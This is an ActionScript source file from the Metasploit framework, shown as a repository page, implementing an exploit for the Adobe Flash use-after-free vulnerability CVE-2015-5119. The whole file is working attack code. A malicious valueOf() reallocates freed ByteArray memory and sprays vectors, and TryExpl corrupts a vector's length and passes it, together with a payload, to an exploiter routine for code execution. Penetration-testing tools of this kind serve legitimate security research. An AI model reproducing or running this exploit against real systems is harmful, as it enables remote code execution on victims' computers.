metasploit-framework/external/source/exploits/CVE-2015-5119/MyClass.as

93 lines
2.3 KiB
ActionScript
Raw Normal View History

package
{
import flash.display.DisplayObjectContainer;
import flash.utils.ByteArray;
import flash.system.Capabilities;
import flash.events.MouseEvent;
import flash.external.ExternalInterface;
public class MyClass
{
static var
_gc:Array,
_va:Array,
_ba:ByteArray,
_isDbg:Boolean = Capabilities.isDebugger;
// define malicious valueOf()
prototype.valueOf = function ()
{
Logger.log("MyClass.valueOf()");
_va = new Array(5);
_gc.push(_va); // protect from GC // for RnD
// reallocate _ba storage
_ba.length = 0x1100;
// reuse freed memory
for(var i:int; i < _va.length; i++)
_va[i] = new Vector.<uint>(0x3f0);
// return one byte for overwriting
return 0x40;
}
// try to corrupt the length value of Vector.<uint>
static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray) : Boolean
{
Logger.log("tryexpl")
try
{
var alen:int = 90; // should be multiply of 3
var a = new Array(alen);
if (_gc == null) _gc = new Array();
_gc.push(a); // protect from GC // for RnD
// try to allocate two sequential pages of memory: [ ByteArray ][ MyClass2 ]
for(var i:int; i < alen; i+=3){
a[i] = new MyClass2(i);
a[i+1] = new ByteArray();
a[i+1].length = 0xfa0;
a[i+2] = new MyClass2(i+2);
}
// find these pages
var v:Vector.<uint>;
for(i=alen-5; i >= 0; i-=3)
{
// take next allocated ByteArray
_ba = a[i];
// call valueOf() and cause UaF memory corruption
_ba[3] = new MyClass();
// _ba[3] should be unchanged 0
Logger.log("_ba[3] = " + _ba[3]);
if (_ba[3] != 0) throw new Error("can't cause UaF");
// check results // find corrupted vector
for(var j:int=0; j < _va.length; j++){
v = _va[j];
if (v.length != 0x3f0) {
Logger.log("v.length = 0x" + v.length.toString(16));
var exploiter:Exploiter = new Exploiter(e, platform, os, payload, v, 0x3f0)
Logger.log("v.length = 0x" + v.length.toString(16));
return true
}
}
}
Logger.log("bad allocation. try again.");
}
catch (e:Error)
{
Logger.log("TryExpl() " + e.toString());
}
return false;
}
}
}